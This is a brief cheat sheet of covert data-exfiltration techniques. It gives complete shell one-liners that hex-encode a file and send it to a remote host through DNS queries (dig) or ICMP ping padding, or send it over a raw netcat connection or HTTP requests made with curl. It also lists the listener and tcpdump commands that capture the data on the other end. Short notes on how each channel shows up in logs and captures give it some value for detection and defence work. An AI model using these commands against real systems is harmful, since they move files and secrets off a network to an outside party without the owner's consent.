# Covert channels for data exfiltration


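DNS

The file is hex-dumped 16 bytes per line and each line is sent as a query name straight to $remote, which only captures the packets and never answers. On the wire this is a burst of single-label, 32-character hex-only queries to one resolver; DNS query logging and egress rules that limit port 53 to approved resolvers surface it.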

local# xxd -p -c 16 $file | while read line; do dig @$remote $line. +time=1 +retry=0 & done
remote# tcpdump -ni any -Xs 0 "host $remote and udp dst port 53"

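ICMP

ping -p fills the echo-request payload from a hex pattern, so the data rides in the padding bytes. In a capture the indicator is echo requests whose payload differs from the sender's default padding and changes from packet to packet.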

local# xxd -p -c 32 $file | while read line; do ping -p $line -c 1 $remote; done
remote# tcpdump -ni any -Xs 0 "host $remote and icmp"

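Raw

A single plain TCP connection carries the file unencoded and unencrypted, so content inspection and egress filtering of outbound connections to unexpected ports apply directly.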

local# nc $remote $port < $file
remote# nc -l -p $port

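HTTP/S

The examples below use plain http:// to a netcat listener, so the request body and headers are readable in a packet capture or proxy log. The backtick forms also put the file contents on curl's command line, where process-argument auditing records them.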

local# curl --data "@$file" http://$remote:$port
local# curl --data "param=`cat $file`" http://$remote:$port
local# curl --header "header=`cat $file`" http://$remote:$port
remote# nc -l -p $port
